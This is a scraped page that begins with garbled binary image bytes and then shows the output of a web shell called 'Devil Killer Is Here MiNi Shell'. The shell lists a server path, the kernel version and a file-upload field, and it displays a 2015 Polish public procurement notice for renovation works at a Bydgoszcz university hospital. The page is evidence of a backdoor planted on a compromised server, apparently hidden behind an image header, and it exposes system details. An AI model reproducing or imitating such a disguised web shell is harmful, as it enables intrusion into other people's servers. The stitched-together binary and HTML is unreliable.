JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151007/146741-N-2015.html

<p class="kh_header"><b>Bydgoszcz: Utworzenie nowej siedziby Katedry Chirurgii
Naczyniowej i Angiologii oraz Zakładu Pielęgniarstwa Chirurgicznego i Leczenia Ran Przewlekłych w
budynku Poradni Przyklinicznych Szpitala Uniwersyteckiego nr 1 im. dr A. Jurasza w Bydgoszczy przy ul.
M. Curie Skłodowskiej 9.</b><br>
<b>Numer ogłoszenia: 146741 - 2015; data zamieszczenia: 07.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Mikołaja Kopernika w Toruniu  Collegium Medicum im. Ludwika Rydygiera w Bydgoszczy , ul. Jagiellońska 13-15, 85-067 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 5853698, faks (052) 585 36 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cm.umk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie nowej siedziby Katedry Chirurgii
Naczyniowej i Angiologii oraz Zakładu Pielęgniarstwa Chirurgicznego i Leczenia Ran Przewlekłych w
budynku Poradni Przyklinicznych Szpitala Uniwersyteckiego nr 1 im. dr A. Jurasza w Bydgoszczy przy ul.
M. Curie Skłodowskiej 9..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest
wykonanie robót remontowych związanych z zadaniem: Utworzenie nowej siedziby Katedry Chirurgii
Naczyniowej i Angiologii oraz Zakładu Pielęgniarstwa Chirurgicznego i Leczenia Ran Przewlekłych w
budynku Poradni Przyklinicznych Szpitala Uniwersyteckiego nr 1 im. dr A. Jurasza w Bydgoszczy przy ul.
M. Curie Skłodowskiej 9. Szczegółowy opis przedmiotu zamówienia określa Dokumentacja techniczna stanowiąca Załącznik nr 10 do niniejszej SIWZ, przy czym należy uwzględnić zmiany w stosunku do
Projektu budowlano-wykonawczego w zakresie opisanym w pkt. 3 części III SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.31.00.00-3, 45.33.00.00-9, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium przed upływem terminu
(łącznie z podaną godziną) składania ofert wskazanego w Części XII pkt. 1.2 SIWZ (art. 45 ustawy) w
wysokości 4.000,00 zł (słownie: cztery tysiące złotych) w jednej z n/w form: a) pieniądzu - przelew na
rachunek bankowy Zamawiającego w Banku Pekao S.A. w Warszawie O/Bydgoszcz nr 36 1240 6478 1111
0000 4947 8789, na dowodzie wpłaty należy zaznaczyć: przetarg na Utworzenie nowej siedziby Katedry
Chirurgii Naczyniowej i Angiologii oraz Zakładu Pielęgniarstwa Chirurgicznego i Leczenia Ran
Przewlekłych w budynku Poradni Przyklinicznych Szpitala Uniwersyteckiego nr 1 im. dr A. Jurasza w
Bydgoszczy przy ul. M. Curie Skłodowskiej 9 b) poręczeniach bankowych lub poręczeniach spółdzielczej
kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, c)
gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e) poręczeniach udzielanych przez
podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej
Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275). 2. W przypadku wnoszenia wadium
w formie pieniężnej Zamawiający wymaga, aby oryginał lub kopia (przygotowana z zastosowaniem
postanowień Części XI pkt. 7) dowodu wpłaty dołączony został do oferty. W każdym przypadku oryginał lub
kopia (przygotowana z zastosowaniem postanowień Części XI pkt. 7) dowodu wpłaty nie może być
doręczony Zamawiającemu później niż do upływu terminu wskazanego w Części XII pkt. 1.2 SIWZ. W
przypadku wnoszenia wadium w formie pieniężnej wniesienie w terminie nastąpi wówczas, gdy wskazany
powyżej rachunek bankowy Zamawiającego zostanie uznany kwotą wadium przed upływem terminu
(łącznie z podaną godziną), o którym mowa w Części XII pkt. 1.2 SIWZ. 3. W przypadku wnoszenia
wadium w formie niepieniężnej beneficjentem musi być Zamawiający. Zamawiający zaleca, aby oryginał
dokumentu dołączony został do oferty, a jeżeli nie będzie to możliwe to oryginał dokumentu nie może być doręczony Zamawiającemu później niż do upływu terminu (łącznie z godziną), o którym mowa w Części XII
pkt. 1.2 SIWZ. Przez doręczenie uznaje się złożenie oryginału dokumentu w kasie siedziby Collegium
Medicum III p, czynnej w godzinach: Poniedziałek 10:45 - 14:45 Wtorek 7:15 - 11:15 Środa 10:45 - 14:45
Czwartek 7:15 - 11:15 Piątek 10:45 - 14:45 z zastrzeżeniem wskazanego w zdaniu poprzednim terminu
(łącznie z godziną) przyjęcia dokumentu w dniu składania ofert. 4. W przypadku wnoszenia wadium w
formie gwarancji bankowej lub ubezpieczeniowej Zamawiający wymaga, aby wystawiona gwarancja była
bezwarunkowa, nieodwołalna i płatna na pierwsze żądanie Zamawiającego. 5. Wykonawca, który wycofał
swoją ofertę, a zabezpieczył ją wadium, powinien wystąpić do Zamawiającego na piśmie o dokonanie
zwrotu wadium w formie i wysokości, w której je wniósł. 6. Zamawiający dokonuje zwrotu wadium zgodnie z
przepisem art. 46 ustawy. 7. Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach
określonych w art. 46 ust. 4a oraz art. 46 ust. 5 ustawy. 8. Wykonawca, który nie wniesie wadium do
upływu terminu składania ofert zostanie wykluczony na podst. art. 24 ust. 2 pkt. 2 ustawy, a jego oferta
zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku, jeżeli: Wykonawca wykaże się w okresie
ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia
działalności jest krótszy w tym okresie wykonaniem jednej roboty budowlanej polegającej na
adaptacji, przebudowie, rozbudowie lub remoncie budynku użyteczności publicznej o wartości
robót budowlanych nie mniejszej niż 200.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca dysponuje lub będzie
dysponować następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia i będą odpowiedzialne za kierowanie robotami budowlanymi tj.: robotami budowlanymi- min. 1
osoba musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w
specjalności konstrukcyjno-budowlanej zgodnie z art. 13 ust. 1 pkt. 2) i art. 14, ust. 1 pkt. 2) oraz
art. 12 ust. 7 Ustawy prawo budowlane (Dz. U. z 2013 r., Nr 1409 ze zm.) robotami
instalacyjnymi- min. 1 osoba musi posiadać uprawnienia budowlane do kierowania robotami
budowlanymi w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i
elektroenergetycznych zgodnie z art. 13 ust. 1 pkt. 2) i art. 14, ust. 1 pkt. 5) oraz art. 12 ust. 7
Ustawy prawo budowlane Dz. U. z 2013 r., Nr 1409 ze zm. robotami instalacyjnymi- min. 1 osoba
musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,
wodociągowych i kanalizacyjnych zgodnie z art. 13 ust. 1 pkt. 2 i art. 14, ust. 1 pkt. 4 oraz art. 12
ust. 7 Ustawy prawo budowlane Dz. U. z 2013 r., Nr 1409 ze zm.Zamawiający nie dopuszcza
łączenia przez jedną i tę samą osobę ww. funkcji. Zamawiający określając wymogi dla każdej
osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im
uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz
Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy prawo
budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach
członkowskich Unii Europejskiej. Ponadto Zamawiający uzna spełnienie wyżej wymienionych
wymagań, jeżeli osoby posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca
1994r. prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania
zawodowego, odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych
funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w
dotychczasowym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca
zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za najważniejsze roboty Zamawiający uznaje wyłącznie wykonanie jednej roboty budowlanej
polegającej na adaptacji, przebudowie, rozbudowie lub remoncie budynku użyteczności publicznej
o wartości robót budowlanych nie mniejszej niż 200.000,00 zł brutto. Dowodami, o których mowa
powyżej są: - poświadczenie; - inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. W
przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w
Wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku
przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy,
którego wzór stanowi załącznik nr 3 do SIWZ. 2)Wykonawcy wspólnie ubiegający się o udzielenie
zamówienia: a)winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo do reprezentowania w postępowaniu i zawarcia Umowy w sprawie zamówienia, b)
ponoszą solidarną odpowiedzialność za wykonanie Umowy i wniesienie zabezpieczenia należytego
wykonania Umowy, c)warunki określone przez Zamawiającego mogą spełniać łącznie, z zastrzeżeniem
oceny niepodlegania wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy, w związku z czym
każdy z Wykonawców musi samodzielnie wykazać brak podstaw do wykluczenia z postępowania o
udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy. 3)Jeżeli, w przypadku
Wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24
ust. 1 pkt 5-8, 10 i 11 ustawy, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
Wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo
administracyjnego miejsca zamieszkania, dotyczące niekaralności tych osób w zakresie określonym w art.
24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert z tym, że w przypadku, gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym
organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca
zamieszkania tych osób lub przed notariuszem. 4)Jeżeli w kraju miejsca zamieszkania osoby lub w kraju,
w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa
w pkt. 2.4. części VI SIWZ, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się
także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym,
administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio, kraju miejsca
zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed
notariuszem. 5)W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego
siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić
się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym
Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji
dotyczących przedłożonego dokumentu. 6)Wartości podane w dokumentach w walutach obcych, celem
oceny spełnienia warunku udziału w postępowaniu, zostaną przeliczone na złote wg kursu średniego danej
waluty do złotego, publikowanego w tabeli kursów średnich Narodowego Banku Polskiego (NBP),
obowiązujących na dzień publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień
Publicznych, z dokładnością do czterech miejsc po przecinku. 7)Wykonawcy wspólnie ubiegający się o
udzielenie zamówienia, dokumenty wymienione w pkt 2.2.-2.5. oraz 2.8. każdy z Wykonawców składa
osobno, tj. w przypadku Wykonawców występujących wspólnie na podstawie art. 23 ust. 1 ustawy, każdy z
Wykonawców musi samodzielnie wykazać brak podstaw do wykluczenia z postępowania o udzielenie
zamówienia w okolicznościach, o których mowa w art. 24 ust. 1 ustawy. 8)W przypadku ewentualnych
Podwykonawców, tj. podmiotów, które będą uczestniczyły w wykonaniu zamówienia, należy dołączyć
wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom - wzór
stanowi załącznik nr 8 do SIWZ. Brak informacji, o której mowa w zdaniu poprzednim będzie uznany za
stwierdzenie samodzielnego wykonania zamówienia przez Wykonawcę, który złoży ofertę. 9)Na podstawie
art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym,
osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych
podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca, w takiej
sytuacji, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie
realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
